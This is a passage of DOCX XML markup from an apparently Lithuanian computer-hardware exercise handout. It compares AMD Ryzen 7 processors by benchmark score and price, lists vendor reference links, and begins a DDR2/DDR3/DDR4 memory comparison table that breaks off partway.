      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>skiriasi 400 MHz</w:t>
      </w:r>
      <w:r w:rsidR="00F42309" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. G</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>aminimo technologij</w:t>
      </w:r>
      <w:r w:rsidR="00F42309" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> patobulėjo 12nm </w:t>
      </w:r>
      <w:r w:rsidR="45F7E615" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7nm. Pagal našumą naujausias</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">procesorius </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>lenkia visus</w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">idžiausias skirtumas yra tarp </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AMD RYZEN 7 5800XT </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(23964) naujausiojo ir</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">seniausiojo </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AMD RYZEN 7 2700X </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(17614). </w:t>
      </w:r>
      <w:r w:rsidR="00F42309" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>titinkamai</w:t>
      </w:r>
      <w:r w:rsidR="00F42309" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> skiriasi</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir kaina</w:t>
      </w:r>
      <w:r w:rsidR="00F42309" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>naujausias</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>procesorius</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">kainuoja nuo $449.99 ir daugiau, o seniausiojo kaina yra $283 arba mažiau. Pagal </w:t>
      </w:r>
      <w:r w:rsidR="2E988921" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">našumo </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rodiklį naujausias</w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> procesorius</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>visus lenkia.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">AMD </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">RYZEN 7 3800XT </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ir tik tada </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AMD RYZEN 7 2700X. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Našumas skirias</w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i todėl, kad</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>AMD patobulino</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>architektūrą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF64A40" w14:textId="77777777" w:rsidR="0082657F" w:rsidRPr="005A5C28" w:rsidRDefault="0082657F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD83A00" w14:textId="09549574" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB7B2DE" w14:textId="2FEA986A" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">AMD Processors for Desktops. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">AMD. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId284">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.amd.com/en/products/processors-desktop</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D86217D" w14:textId="2FEA986A" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Intel® Core™ Processor Family. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Intel. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId285">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.intel.com/content/www/us/en/products/processors/core.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="595FC16D" w14:textId="2FEA986A" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Microprocessor/Co-processor/Microcontroller families. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">CPU-World. </w:t>
      </w:r>
      <w:hyperlink r:id="rId286">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.cpu-world.com/CPUs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="57B17A42" w14:textId="2FEA986A" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Qualcomm Processors. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Qualcomm. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId287">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.qualcomm.com/products/processors</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5487355A" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">List of MediaTek processors. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Wikipedia.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId288">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/List_of_MediaTek_processors</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50CC51EB" w14:textId="17E20284" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="00B0488D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5926981C" w14:textId="77777777" w:rsidR="00ED6F79" w:rsidRPr="005A5C28" w:rsidRDefault="00ED6F79" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PALYGINTI TRIJŲ KARTŲ OPERATYVINĘ ATMINTĮ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38108AF4" w14:textId="5F8B3B2F" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="00E058DF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidR="1EA8E69B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="1EA8E69B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C801D5" w14:textId="2FEA986A" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692FBA87" w14:textId="1A06F1A8" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="00B0488D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>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7"/>
        <w:gridCol w:w="1513"/>
        <w:gridCol w:w="1513"/>
        <w:gridCol w:w="1513"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6D924963" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5377" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4472A010" w14:textId="092FC52A" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DDR SDRAM atminties standartas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="29DF6CD2" w14:textId="66C37EBA" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DDR2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7386CE36" w14:textId="79792414" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DDR3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="410C44B8" w14:textId="1D01B91B" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DDR4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="709011D8" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5377" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="24093E0E" w14:textId="7D31D4CF" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Prefeksas (Prefetch bit per bank)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C86BFCC" w14:textId="36CEB940" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4 - Bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B59CDC4" w14:textId="6BA41D59" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8 - Bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="644D9390" w14:textId="17B0141E" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Bit per Bank</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2AF61C70" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5377" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0F2E2241" w14:textId="63078689" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Darbiniai dažniai (Date Rate MHz)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CD49098" w14:textId="73B914BE" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>533 - 800</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
